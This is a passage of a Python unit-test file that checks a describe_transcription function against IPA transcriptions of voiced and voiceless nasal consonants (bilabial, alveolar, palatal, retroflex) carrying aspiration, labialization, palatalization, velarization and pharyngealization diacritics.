def test_m̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized bilabial nasal pulmonic egressive consonant
def test_mʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰʷ")
self.assertEqual(actual, expected)
def test_m̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized bilabial nasal pulmonic egressive consonant
def test_mʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰʲ")
self.assertEqual(actual, expected)
def test_m̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized bilabial nasal pulmonic egressive consonant
def test_mʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰˠ")
self.assertEqual(actual, expected)
def test_m̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized bilabial nasal pulmonic egressive consonant
def test_mʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰˤ")
self.assertEqual(actual, expected)
def test_m̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰˤ")
self.assertEqual(actual, expected)
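# These transcriptions are plain code-point sequences: a base letter followed
# by combining diacritics and spacing modifier letters, e.g.:
#
#     >>> [hex(ord(c)) for c in "m̥ʰʷ"]
#     ['0x6d', '0x325', '0x2b0', '0x2b7']
#
# so describe_transcription presumably parses the trailing marks in order
# rather than matching whole precomposed symbols.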
# voiceless alveolar nasal pulmonic egressive consonant
def test_n̊_is_the_representation_of_the_voiceless_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊")
self.assertEqual(actual, expected)
def test_n̥_is_the_representation_of_the_voiceless_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar nasal pulmonic egressive consonant
def test_n̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʷ")
self.assertEqual(actual, expected)
def test_n̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar nasal pulmonic egressive consonant
def test_n̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʲ")
self.assertEqual(actual, expected)
def test_n̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar nasal pulmonic egressive consonant
def test_n̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ˠ")
self.assertEqual(actual, expected)
def test_n̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar nasal pulmonic egressive consonant
def test_n̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ˤ")
self.assertEqual(actual, expected)
def test_n̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar nasal pulmonic egressive consonant
def test_n̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰ")
self.assertEqual(actual, expected)
def test_n̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar nasal pulmonic egressive consonant
def test_n̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰʷ")
self.assertEqual(actual, expected)
def test_n̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar nasal pulmonic egressive consonant
def test_n̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰʲ")
self.assertEqual(actual, expected)
def test_n̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar nasal pulmonic egressive consonant
def test_n̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰˠ")
self.assertEqual(actual, expected)
def test_n̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar nasal pulmonic egressive consonant
def test_n̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰˤ")
self.assertEqual(actual, expected)
def test_n̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar nasal pulmonic egressive consonant
def test_n_is_the_representation_of_the_voiced_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n")
self.assertEqual(actual, expected)
# voiced labialized alveolar nasal pulmonic egressive consonant
def test_nʷ_is_the_representation_of_the_voiced_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar nasal pulmonic egressive consonant
def test_nʲ_is_the_representation_of_the_voiced_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar nasal pulmonic egressive consonant
def test_nˠ_is_the_representation_of_the_voiced_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar nasal pulmonic egressive consonant
def test_nˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar nasal pulmonic egressive consonant
def test_nʰ_is_the_representation_of_the_voiced_aspirated_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰ")
self.assertEqual(actual, expected)
def test_n̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar nasal pulmonic egressive consonant
def test_nʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰʷ")
self.assertEqual(actual, expected)
def test_n̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar nasal pulmonic egressive consonant
def test_nʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰʲ")
self.assertEqual(actual, expected)
def test_n̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar nasal pulmonic egressive consonant
def test_nʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰˠ")
self.assertEqual(actual, expected)
def test_n̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar nasal pulmonic egressive consonant
def test_nʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰˤ")
self.assertEqual(actual, expected)
def test_n̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless palatal nasal pulmonic egressive consonant
def test_ɲ̊_is_the_representation_of_the_voiceless_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊")
self.assertEqual(actual, expected)
def test_ɲ̥_is_the_representation_of_the_voiceless_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥")
self.assertEqual(actual, expected)
# voiceless labialized palatal nasal pulmonic egressive consonant
def test_ɲ̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʷ")
self.assertEqual(actual, expected)
def test_ɲ̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized palatal nasal pulmonic egressive consonant
def test_ɲ̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʲ")
self.assertEqual(actual, expected)
def test_ɲ̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized palatal nasal pulmonic egressive consonant
def test_ɲ̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ˠ")
self.assertEqual(actual, expected)
def test_ɲ̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized palatal nasal pulmonic egressive consonant
def test_ɲ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ˤ")
self.assertEqual(actual, expected)
def test_ɲ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced palatal nasal pulmonic egressive consonant
def test_ɲ_is_the_representation_of_the_voiced_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ")
self.assertEqual(actual, expected)
# voiced labialized palatal nasal pulmonic egressive consonant
def test_ɲʷ_is_the_representation_of_the_voiced_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʷ")
self.assertEqual(actual, expected)
# voiced palatalized palatal nasal pulmonic egressive consonant
def test_ɲʲ_is_the_representation_of_the_voiced_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʲ")
self.assertEqual(actual, expected)
# voiced velarized palatal nasal pulmonic egressive consonant
def test_ɲˠ_is_the_representation_of_the_voiced_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized palatal nasal pulmonic egressive consonant
def test_ɲˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲˤ")
self.assertEqual(actual, expected)
# voiced aspirated palatal nasal pulmonic egressive consonant
def test_ɲʰ_is_the_representation_of_the_voiced_aspirated_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized palatal nasal pulmonic egressive consonant
def test_ɲʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰʷ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized palatal nasal pulmonic egressive consonant
def test_ɲʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰʲ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized palatal nasal pulmonic egressive consonant
def test_ɲʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰˠ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized palatal nasal pulmonic egressive consonant
def test_ɲʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰˤ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless retroflex nasal pulmonic egressive consonant
def test_ɳ̊_is_the_representation_of_the_voiceless_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊")
self.assertEqual(actual, expected)
def test_ɳ̥_is_the_representation_of_the_voiceless_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex nasal pulmonic egressive consonant
def test_ɳ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʷ")
self.assertEqual(actual, expected)
def test_ɳ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex nasal pulmonic egressive consonant
def test_ɳ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʲ")
self.assertEqual(actual, expected)
def test_ɳ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex nasal pulmonic egressive consonant
def test_ɳ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ˠ")
self.assertEqual(actual, expected)
def test_ɳ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex nasal pulmonic egressive consonant
def test_ɳ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ˤ")
self.assertEqual(actual, expected)
def test_ɳ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex nasal pulmonic egressive consonant
def test_ɳ_is_the_representation_of_the_voiced_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ")
self.assertEqual(actual, expected)
# voiced labialized retroflex nasal pulmonic egressive consonant
def test_ɳʷ_is_the_representation_of_the_voiced_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex nasal pulmonic egressive consonant
def test_ɳʲ_is_the_representation_of_the_voiced_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex nasal pulmonic egressive consonant
def test_ɳˠ_is_the_representation_of_the_voiced_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
